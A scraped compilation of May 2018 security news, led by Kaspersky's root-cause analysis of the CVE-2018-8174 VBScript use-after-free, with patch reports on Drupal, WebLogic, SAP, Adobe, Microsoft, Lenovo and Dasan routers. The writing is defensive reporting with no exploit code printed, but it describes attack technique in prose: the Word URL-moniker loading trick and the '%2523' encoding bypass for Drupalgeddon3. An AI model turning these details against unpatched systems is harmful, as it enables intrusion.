Proof-of-concept (PoC) exploits have been released for Windows and Linux operating systems.


The King is dead. Long live the King!

10.5.2018 Kaspersky Vulnerebility
Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.

Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.

Virustotal scan results for CVE-2018-8174

After the malicious sample was processed in our sandbox system, we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let’s take a look at the full infection chain:

Infection chain

The infection chain consists of the following steps:

A victim receives a malicious Microsoft Word document.
After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.
The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.
Initial analysis
We’ll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call “nibble drop“.

Obfuscated object data in RTF document

After deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a URL Moniker CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler (CVE-2017-0199).

URL Moniker is used to load an IE exploit

With the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes; the Content-Type HTTP header in the server’s response being one of them. Because the default handler for the “application/hta” Content-Type is mshta.exe,it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.

However, if we follow the embedded URL in the latest exploit, we can see that the content type in the server’s response is not “application/hta”, which was a requirement for CVE-2017-0199 exploitation, but rather “text/html”. The default OLE server for “text/html” is mshtml.dll, which is a library that contains the engine, behind Internet Explorer.

WINWORD.exe querying registry for correct OLE server

Furthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, ‘0xE’. Because this disallows an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.

Using a URL moniker like that to load a remote web page is possible, because Microsoft’s patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from instantiating at runtime.

Some of the filtered COM objects, restricted from creating by IActivationFilter in MSO.dll

At the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. TheMSHTML CLSID ({{25336920-03F9-11CF-8FD0-00AA00686F13}}) is not in the list, which is why the MSHTML COM server is successfully created in Word context.

This is where it becomes interesting. Despite a Word document being the initial attack vector, thevulnerability is actually in VBScript, not in Microsoft Word. This is the first time we’ve seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. This technique allows one to load and render a web page using the IE engine, even if default browser on a victim’s machine is set to something different.

The VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.

Obfuscated IE exploit

Vulnerability root cause analysis
For the root cause analysis we only need to look at the first function (‘TriggerVuln’) in the deobfuscated version which is called right after ‘RandomizeValues’ and ‘CookieCheck’.

Vulnerability Trigger procedure after deobfuscation

To achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the ‘ClassToReuse’ object, the exploit allocates some class objects. To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):

CVE-2018-8174 Proof Of Concept

When we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.

Access Violation on a call to freed memory

Freed memory pointer is reused when the second array (ArrB) is destroyed

With this PoC we were able to trigger a Use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same ‘ClassVuln’ object in memory. This is possible because when “Erase ArrA” is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.

It checks that the pointer to a tagSafeArray structure is not NULL and that its reference count, stored in the cLocks field is zero, and then continues to call ReleaseResources.

VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object

ReleaseResources, in turn will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear; a function that iterates each member of an array and performs the necessary deinitialization and calls the relevant class destructor if necessary. In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.

Root cause of CVE-2018-8174 – ‘refCount’ being checked only once, before TerminateClass function

This ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no checks will be made before finally freeing the class object.

Class_Terminate is a deprecated method, now replaced by the ‘Finalize’ procedure. It is used to free acquired resources during object destruction and is executed as soon as object is set to nothing and there are no more references to that object. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside of that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon to be freed ClassVuln object.

Crash, due to calling an invalid virtual method when freeing second object

After the Class_Terminate sub is finished, the object at Arr(1) is freed, but ArrB(1) still maintains a reference to that freed class object. When the execution continues, and ArrB is erased, the whole cycle repeats, except that this time, ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.

Conclusion
In this write up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting Use-After-Free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we’ve seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332) as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of scope of this article.

With CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as It allows you force IE to load ignoring the default browser settings on a victim’s system.

We expect this vulnerability to become one of the most exploited in the near future, as it won’t be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying latest security updates, and using a security solution with behavior detection capabilities.

In our opinion this is the same exploit which Qihoo360 Core Security Team called “Double Kill” in their recent publication. While this exploit is not limited to browser exploitation, it was reported as an IE zero day, which caused certain confusion in the security community.

After finding this exploit we immediately shared the relevant information with Microsoft and they confirmed that it is in fact CVE-2018-8174.

This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com

Detection
Kaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:

HEUR:Exploit.MSOffice.Generic – RTF document
PDM:Exploit.Win32.Generic – IE exploit – detection with Automatic Exploit Prevention technology
HEUR:Exploit.Script.Generic – IE exploit
HEUR:Trojan.Win32.Generic – Payload
IOCs
b48ddad351dd16e4b24f3909c53c8901 – RTF document
15eafc24416cbf4cfe323e9c271e71e7 – Internet Explorer exploit (CVE-2018-8174)
1ce4a38b6ea440a6734f7c049f5c47e2 – Payload
autosoundcheckers[.]com


SAP Patches Internet Graphics Server Flaws
9.5.2018 securityweek  
Vulnerebility

SAP this week released its May 2018 set of security patches to address more than a dozen vulnerabilities across its product portfolio, including four bugs in Internet Graphics Server.

The company released 9 new Security Notes as part of the SAP Security Patch Day, to which Support Package Notes and updates to previously released notes are added, for a total of 16 notes released since the previous Patch Day (the second Tuesday of the previous month).

Most of the security bugs addressed this month were rated Medium severity, with just one assessed with a Low severity rating.

Missing authorization checks and Denial of service issues were the most commonly encountered vulnerabilities, but SAP also addressed Cross-Site Scripting, code injection, information disclosure, open redirect, XML external entity, implementation flaw, and spoofing bugs.

SAP Internet Graphics Server (IGS), the engine used by SAP for generating visual components like graphics or charts, was the most affected product this month, accounting for four of the Security Notes.

The vulnerabilities addressed in it include CVE-2018-2420 – Unrestricted File Upload (allowing an attacker to upload any file (including script files) without proper file format validation), CVE-2018-2421 and CVE-2018-2422 – Denial of Service, and CVE-2018-2423 – Denial of Service in IGS HTTP and RFC listener.

By exploiting CVE-2018-2420, an attacker could “gain access to user’s session and learn business-critical information, in some cases it is possible to get control over this information. In addition, XSS can be used for unauthorized modifying of displayed site content,” ERPScan reveals.

CVE-2018-2420 and CVE-2018-2421 are addressed in security notes #2615635 and #2616599, both expected to be discussed at an upcoming security conference in June.

SAP has addressed numerous vulnerabilities in IGS over the past months, including Denial of Service, Cross-Site Scripting (XSS), and Log Injection attacks, amongst others, Onapsis points out.

Two notes released in February (#2525222) and March (#2538829) addressed together more than 15 vulnerabilities, some very severe.

Another important vulnerability addressed this month is CVE-2018-2418, a Code Injection in SAP MaxDB ODBC Driver. The flaw allows an attacker to inject and run their own code, obtain additional sensitive information, modify or delete data, change the output of the system, create new users, control the behavior of the system, or escalate privileges and perform a DoS attack.

This month, SAP also re-released security note #2190621 (initially published two and a half years ago) with updated CVSS, prerequisite and solution information related to incorrect logging of IP addresses in the Security Audit Logging (SAL) function.

In some environments where the SAP system is behind a proxy or a NAT, the original client IP address is logged instead of the NAT-translated IP address. Not only can client IP addresses be easily manipulated, but the upcoming General Data Protection Regulation (GDPR) could consider client IP addresses as personal data, Onapsis notes.

A couple of weeks ago, Onapsis revealed that 9 out of 10 SAP systems were found to be vulnerable to a SAP Netweaver bug that was first identified in 2005. The vulnerability provides an attacker with unrestricted access to the system, allowing them to read information, extract data, or shut the system down.

“The threat still exists within the default security settings of every Netweaver based SAP product such as SAP ERP, SAP CRM, S/4 HANA, SAP GRC Process and Access Control, SAP Process Integration/Exchange Infrastructure (PI/XI), SAP Solution Manager, SAP SCM, SAP SRM and others,” the firm explains.


Misinterpretation of Intel Docs Leads to Flaw in Hypervisors, OSs
9.5.2018 securityweek
Vulnerebility

The developers of several major operating systems and hypervisors misinterpreted documentation from Intel and introduced a potentially serious vulnerability to their products.

According to an advisory published on Tuesday by CERT/CC, the flaw impacts the Linux kernel and software made by Apple, the DragonFly BSD Project, Red Hat, the FreeBSD Project, Microsoft, SUSE Linux, Canonical, VMware, and the Xen Project. CERT/CC also provides a long list of other companies whose products may be affected.

The vulnerability, tracked as CVE-2018-8897, exists due to the way operating systems and hypervisors handle MOV/POP to SS instructions. Exploitation requires local access to the targeted system.

Impact varies depending on the affected software. In the case of Linux, it can lead to a crash of the kernel and a denial-of-service (DoS) condition. Microsoft says an attacker can exploit the security hole on Windows for privilege escalation. The Xen Project says a malicious PV guest can escalate privileges to the ones of the hypervisor, while CERT/CC warns that an attacker can “read sensitive data in memory or control low-level operating system functions.”

Patches have been released for the Linux kernel, Windows, Xen and various Linux distributions, but in most cases the issue has been classified only as “moderate” or “important.” Proof-of-concept (PoC) exploits have been created for both Windows and Linux.

The researchers who discovered the vulnerability, Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io, say it impacts both Intel and AMD hardware. A paper published by the experts provides technical details.

According to CERT/CC, the problem appears to exist due to developers misinterpreting existing documentation.

“The MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction,” CERT/CC wrote in its advisory.

“If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at Current Privilege Level (CPL) < 3, a debug exception is delivered after the transfer to CPL < 3 is complete. Such deferred #DB exceptions by MOV SS and POP SS may result in unexpected behavior.

“Therefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3. This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions,” CERT/CC added.


Third Critical Drupal Flaw Discovered—Patch Your Sites Immediately
9.5.2018 thehackernews 
Vulnerebility
Damn! You have to update your Drupal websites.
Yes, of course once again—literally it’s the third time in last 30 days.
As notified in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core.
Drupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability.
The new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed Drupalgeddon2 (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update.
According to a new advisory released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely.
How to Patch Drupal Vulnerability

Since the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible.
If you are running 7.x, upgrade to Drupal 7.59.
If you are running 8.5.x, upgrade to Drupal 8.5.3.
If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.
It should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw.
"We are not aware of any active exploits in the wild for the new vulnerability," a drupal spokesperson told The Hacker News. "Moreover, the new flaw is more complex to string together into an exploit."
Technical details of the flaw, can be named Drupalgeddon3, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked.
We have seen how attackers developed automated exploits leveraging Drupalgeddon2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites, within few hours after it's detailed went public.
Besides these two flaws, the team also patched a moderately critical cross-site scripting (XSS) vulnerability last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft.
Therefore, Drupal website admins are highly recommended to update their websites as soon as possible.


Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack
9.5.2018 thehackernews 
Vulnerebility

Only a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild.
Announced yesterday, the newly discovered vulnerability (CVE-2018-7602) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered Drupalgeddon2 (CVE-2018-7600) flaw allowed—complete take over of affected websites.
Although Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a proof-of-concept exploit just a few hours after the patch release.
If you have been actively reading every latest story on The Hacker News, you must be aware of how the release of Drupalgeddon2 PoC exploit derived much attention, which eventually allowed attackers actively hijack websites and spread cryptocurrency miners, backdoors, and other malware.
As expected, the Drupal team has warned that the new remote code execution flaw, let's refer it Drupalgeddon3, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers.
In this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal.

The exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server.
Drupalgeddon3 resides due to the improper input validation in Form API, also known as "renderable arrays," which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#).
A Twitter user with handle @_dreadlocked explains that the flaw in Form API can be triggered through the "destination" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a "node" is any piece of individual content, such as a page, article, forum topic, or a post.
Since this "destination" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code.
What I have understood from the PoC exploit released by another Twitter user, using handle @Blaklis_, is that the unsanitized values pass though stripDangerousValues() function that filters "#" character and can be abused by encoding the "#" character in the form of "%2523".
The function decodes "%2523" into "%23," which is the Unicode version for "#" and will be processed to run arbitrary code on the system, such as a whoami utility.
At first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to "Highly critical."
Therefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.


Faulty Patch for Oracle WebLogic Flaw Opens Updated Servers to Hackers Again
9.5.2018 thehackernews 
Vulnerebility

Earlier this month, Oracle patched a highly critical Java deserialization remote code execution vulnerability in its WebLogic Server component of Fusion Middleware that could allow attackers to easily gain complete control of a vulnerable server.
However, a security researcher, who operates through the Twitter handle @pyn3rd and claims to be part of the Alibaba security team, has now found a way using which attackers can bypass the security patch and exploit the WebLogic vulnerability once again.
WebLogic Server acts as a middle layer between the front end user interface and the backend database of a multi-tier enterprise application. It provides a complete set of services for all components and handles details of the application behavior automatically.
Initially discovered in November last year by Liao Xinxi of NSFOCUS security team, the Oracle WebLogic Server flaw (CVE-2018-2628) can be exploited with network access over TCP port 7001.

 

If exploited successfully, the flaw could allow a remote attacker to completely take over a vulnerable Oracle WebLogic Server. The vulnerability affects versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.
Since a proof-of-concept (PoC) exploit for the original Oracle WebLogic Server vulnerability has already been made public on Github and someone has just bypassed the patch as well, your up-to-date services are again at risk of being hacked.
Although @pyn3rd has only released a short GIF (video) as a proof-of-concept (PoC) instead of releasing full bypass code or any technical details, it would hardly take a few hours or days for skilled hackers to figure out a way to achieve same.
Currently, it is unclear when Oracle would release a new security update to address this issue that has re-opened CVE-2018-2628 flaw.
In order to be at least one-step safer, it is still advisable to install April patch update released by Oracle, if you haven't yet because attackers have already started scanning the Internet for vulnerable WebLogic servers


Adobe fixed a Critical Code Execution issue in Flash Player
9.5.2018 securityaffairs
Vulnerebility

Adobe has released security updated to address several vulnerabilities in its products, including Flash Player, Creative Cloud and Connect products.
The security updates also address a Critical Code Execution vulnerability in Flash Player tracked as CVE-2018-4944. The flaw is a critical type confusion that could be exploited to execute arbitrary code, the good news is that Adobe has rated the flaw with a rating of “2” because the company considers not imminent the development of exploit code.

The vulnerability affects Flash Player 29.0.0.140 and earlier versions and was addressed with the release of version 29.0.0.171 for Windows, Mac, Linux and Chrome OS.

The flaw is a critical type confusion that allows arbitrary code execution (CVE-2018-4944), but Adobe has assigned it a severity rating of “2,” which indicates that exploits are not considered imminent and there is no rush to install the update.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.140 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe.

Adobe also addressed three security vulnerabilities in the Creative Cloud desktop applications for Windows and macOS, the issues affect version 4.4.1.298 and earlier of the apps.

“Adobe has released a security update for the Creative Cloud Desktop Application for Windows and MacOS.” reads the advisory.

“This update resolves a vulnerability in the validation of certificates used by Creative Cloud desktop applications (CVE-2018-4991), and an improper input validation vulnerability (CVE-2018-4992) that could lead to privilege escalation.”

The flaws affecting the Creative Cloud desktop applications are:

an improper input validation that can be exploited to escalate privilege (critical);
an improper certificate validation problem that can lead to a security bypass (important);
an unquoted search path that can be exploited for privilege escalation (important);
All of the vulnerabilities received a priority rating of “2.”

Adobe also addressed an authentication bypass vulnerability affecting Connect versions 9.7.5 and earlier. The flaw rated as “important” could lead the exposure of sensitive information.

“An important authentication bypass vulnerability (CVE-2018-4994) exists in Adobe Connect versions 9.7.5 and earlier. Successful exploitation of this vulnerability could result in sensitive information disclosure.” reads the advisory.


May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
9.5.2018 securityaffairs
Vulnerebility

Microsoft has released the May 2018 Patch Tuesday that addresses more than 60 vulnerabilities, including two Windows zero-day flaws that can be exploited for remote code execution and privilege escalation.
Microsoft May 2018 Patch Tuesday includes security patches for 67 vulnerabilities, including two zero-days that have already been exploited in the wild by threat actors.

The security updates address 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity. The flaws affect many products, including Microsoft Windows, Internet Explorer, Microsoft Edge, Outlook, Microsoft Office, Microsoft Office Exchange Server, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and others.

The most severe issue is CVE-2018-8174 zero-day, dubbed Double Kill, a critical vulnerability that could be exploited by remote attackers to execute arbitrary code on all supported versions of Windows.

The vulnerability was first reported by experts at Qihoo 360, according to the experts is was exploited by a known advanced persistent threat (APT) group in targeted attacks that targeted Internet Explorer and leveraged specially crafted Office weaponized documents.

The Double Kill vulnerability is a use-after-free issue that resides in the way the VBScript Engine handles objects in computer memory. An attacker can exploit the flaw to execute code that runs with the same system privileges as of the logged-in user.

“A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.” reads the advisory published by Microsoft. ” If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Security experts from Kaspersky confirmed the CVE-2018-8174 flaw was exploited in targeted attacks by an APT group, the hackers delivered weaponized documents to allow the download of a second-stage payload. Hackers tricked victims into visiting a malicious HTML page that contained the code to trigger the UAF and a shellcode that downloads the malicious payload.

“In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the IE rendering engine,” reads Microsoft’s explains in its advisory.

“The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.”

The Microsoft May 2018 Patch Tuesday also addresses another zero-day vulnerability tracked as CVE-2018-8120, a privilege escalation that is related the way the Win32k component handles objects in memory. The flaw could be exploited by an authenticated attacker to execute arbitrary code in kernel mode.

“An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisory.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.”

The CVE-2018-8120 flaw only affects Windows 7 and Windows Server 2008.

Microsoft May 2018 Patch Tuesday

The Microsoft May 2018 Patch Tuesday also fixed two Windows vulnerabilities rated as “important” whose details have been made public. The flaws are respectively a privilege escalation issue (CVE-2018-8170) and an information disclosure (CVE-2018-8141).


Lenovo Patches Secure Boot Vulnerability in Servers
9.5.2018 securityweek
Vulnerebility

Lenovo has released patches for a High severity vulnerability impacting the Secure Boot function on some System x servers.

Exploitation of this security vulnerability could result in unauthenticated code being booted. Discovered by the computer maker’s internal testing team and tracked as CVE-2017-3775, the issue impacts a dozen models, including Flex System x240 M5, x280 X6, x480 X6, x880, x3xxx series, and NeXtScale nx360 M5 devices.

“Lenovo internal testing discovered some System x server BIOS/UEFI versions that, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code,” the manufacturer notes.

These systems ship with Secure Boot disabled by default, because signed code is relatively new in the data center environment, the company says, adding that standard operator configurations disable signature checking.

In its advisory, the computer maker published not only the complete list of affected models, but also links to the appropriate BIOS/UEFI update for each model. The company advises admins relying on Secure Boot to control physical access to systems prior to applying the updates.

Lenovo also released a patch for a buffer overflow in Lenovo System Update Drive Mapping Utility. Tracked as CVE-2018-9063, the vulnerability could result in undefined behaviors, such as execution of arbitrary code, the company notes.

Discovered by SaifAllah benMassaoud and assessed with a Medium severity rating, the vulnerability can be exploited by an attacker entering very large user ID or password in order to overrun the program’s buffer. An attacker could potentially execute code with the MapDrv’s privileges.

Lenovo System Update version 5.07.0072 or later addresses the vulnerability and users are advised to update the application to remain protected. To determine the currently installed version of Lenovo System Update, users should launch the application, click the green question mark in the top right corner and then select “About.”

Lenovo System Update automatically checks for newer version when executed, and users should simply launch the application and accept the update when prompted. Manual updates are also possible, by downloading the latest app version from Lenovo’s site.


Critical Code Execution Flaw Patched in Flash Player
9.5.2018 securityweek
Vulnerebility

Adobe has patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products, but the company believes it’s unlikely that the flaws will be exploited in the wild any time soon.

Only one vulnerability has been patched in Flash Player with the release of version 29.0.0.171 for Windows, Mac, Linux and Chrome OS. The issue, reported to Adobe by Jihui Lu of Tencent KeenLab, impacts Flash Player 29.0.0.140 and earlier versions.

The flaw is a critical type confusion that allows arbitrary code execution (CVE-2018-4944), but Adobe has assigned it a severity rating of “2,” which indicates that exploits are not considered imminent and there is no rush to install the update.

A total of three security holes have been patched by Adobe in the Creative Cloud desktop applications for Windows and macOS. Researchers discovered that version 4.4.1.298 and earlier of the apps are impacted by an improper input validation issue that can lead to privilege escalation, an improper certificate validation problem that can lead to a security bypass, and a flaw described as an “unquoted search path” that can be exploited for privilege escalation.

The certificate validation vulnerability has been classified “critical,” while the other two issues have been rated “important.” All of them have a priority rating of “2.”

Wei Wei of Tencent's Xuanwu Lab, Ryan Hileman of Talon Voice, Chi Chou, and Cyril Vallicari of HTTPCS – Ziwit have been credited for finding the flaws.

Finally, Adobe patched an “important” authentication bypass vulnerability affecting Connect versions 9.7.5 and earlier. Exploitation of the flaw can result in the exposure of sensitive information.


Microsoft Patches Two Windows Zero-Day Vulnerabilities
9.5.2018 securityweek
Vulnerebility

Microsoft has fixed more than 60 vulnerabilities with its May 2018 Patch Tuesday updates, including two Windows zero-day flaws that can be exploited for remote code execution and privilege escalation.

The more serious of the zero-day vulnerabilities is CVE-2018-8174, a critical issue that allows attackers to remotely execute arbitrary code on all supported versions of Windows.

The existence of the flaw was revealed last month by Chinese security firm Qihoo 360, which reported that a known advanced persistent threat (APT) actor had been exploiting the vulnerability via Internet Explorer and specially crafted Office documents.

Microsoft has credited Qihoo 360 and Kaspersky Lab for reporting this vulnerability. Both companies say the flaw has been exploited in targeted attacks, but no information is currently available on the threat group.

According to Microsoft, the security hole exists due to the way the VBScript engine handles objects in memory. The weakness can be exploited through Internet Explorer by getting the targeted user to visit a malicious website (including via malvertising) or by embedding an ActiveX control marked “safe for initialization” in an application or an Office document that hosts the Internet Explorer rendering engine.

Kaspersky has described it as a use-after-free (UAF) bug. In the attacks observed by the company, the attackers delivered malicious documents set up to download a second-stage payload, specifically a malicious HTML page. The code in this web page triggers the UAF and a shellcode that downloads a malicious payload is executed.

“This technique, until fixed, allowed criminals to force Internet Explorer to load, no matter which browser one normally used – further increasing an already huge attack surface,” explained Anton Ivanov, the Kaspersky Lab researcher credited by Microsoft for reporting this flaw. “Fortunately, proactive discovery of the threat has led to the timely release of the security patch by Microsoft. We urge organizations and private users to install recent patches immediately, as it won't be long before exploits to this vulnerability make it to popular exploit kits and will be used not only by sophisticated threat actors, but also by standard cybercriminals.”

Trend Micro’s Zero Day Initiative (ZDI) pointed out that CVE-2018-8174 is very similar to CVE-2018-1004, a vulnerability patched by Microsoft in April after it was reported to the company via ZDI.

The second zero-day vulnerability patched on Tuesday by Microsoft is CVE-2018-8120, a privilege escalation weakness in Windows. The flaw, related to how the Win32k component handles objects in memory, allows an attacker to execute arbitrary code in kernel mode, but exploitation requires authentication.

Microsoft says the vulnerability only affects Windows 7 and Windows Server 2008 – newer versions of the operating system do not appear to be impacted. An ESET researcher has been credited for reporting this flaw to Microsoft, but the antivirus firm has yet to share any details about the attacks involving CVE-2018-8120.

The May 2018 updates also resolve two Windows vulnerabilities whose details have been made public. The flaws have been rated “important” and they can lead to privilege escalation (CVE-2018-8170) and information disclosure (CVE-2018-8141).

Nearly 20 other issues addressed this month have been rated “critical.” They include memory corruptions in the Edge and Internet Explorer scripting engines and remote code execution flaws in Hyper-V.

Adobe has also released Patch Tuesday updates, but it has only addressed five security bugs in Flash Player, Creative Cloud and Connect.


Unofficial Patch Released for Zero-Days Affecting Dasan Routers
8.5.2018 securityweek
Vulnerebility

An unofficial patch has been released for the zero-day vulnerabilities affecting a large number of routers made by South Korea-based Dasan Networks.

vpnMentor last week disclosed the details of two vulnerabilities impacting Gigabit-capable Passive Optical Network (GPON) routers made by Dasan. The affected devices are typically provided by ISPs that offer fiber-optic Internet.

There are roughly one million of these GPON home routers exposed to the Internet, a majority located in Mexico, Kazakhstan, and Vietnam.

One of the flaws discovered by vpnMentor (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism, while the second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands. The security holes can be combined to take complete control of vulnerable devices.

Shortly after the vulnerabilities were disclosed, researchers started seeing attempts to exploit the flaws. Chinese security firm Qihoo 360 has observed three campaigns, including ones involving the Mirai and Muhstik botnets. It’s worth noting that the Muhstik botnet was recently spotted exploiting a critical Drupal vulnerability dubbed Drupalgeddon2.

Since it might take a while until Dasan releases an official firmware update for its products, vpnMentor has decided to create its own patch.

Users simply have to enter their router’s local IP address and click the “Run Patch” button. The tool runs a script in the browser that disables the web server so that attackers can no longer gain access to it.

Since this is not an official patch, vpnMentor does not offer any guarantees and the company warns that re-enabling the web server is not an easy process. It does highlight the fact that none of the data entered by users is stored on its systems, which can be verified in the tool’s source code.

The tool and usage instructions are available on vpnMentor’s website.

Routers made by Dasan have been known to be targeted by botnets. Researchers revealed in February that the Satori botnet had ensnared thousands of devices by exploiting a remote code execution vulnerability disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

UPDATE. Dasan has provided the following statement to SecurityWeek:

DASAN Zhone Solutions, Inc. has investigated recent media reports that certain DZS GPON Network Interface Devices (NIDs), more commonly known as routers, could be vulnerable to an authentication bypass exploit.

DZS has determined that the ZNID-GPON-25xx series and certain H640series GPON ONTs, when operating on specific software releases, are affected by this vulnerability. No service impacts from this vulnerability have been reported to DZS to date. After an internal investigation, we have determined the potential impact is much more limited in scope than previously reported in the media. According to DZS sales records, combined with field data gathered to date, we have estimated that the number of GPON ONT units that may be potentially impacted to be less than 240,000. In addition, given the relative maturity of the products in their lifecycle, we think the impact is limited to even fewer devices.

Product History

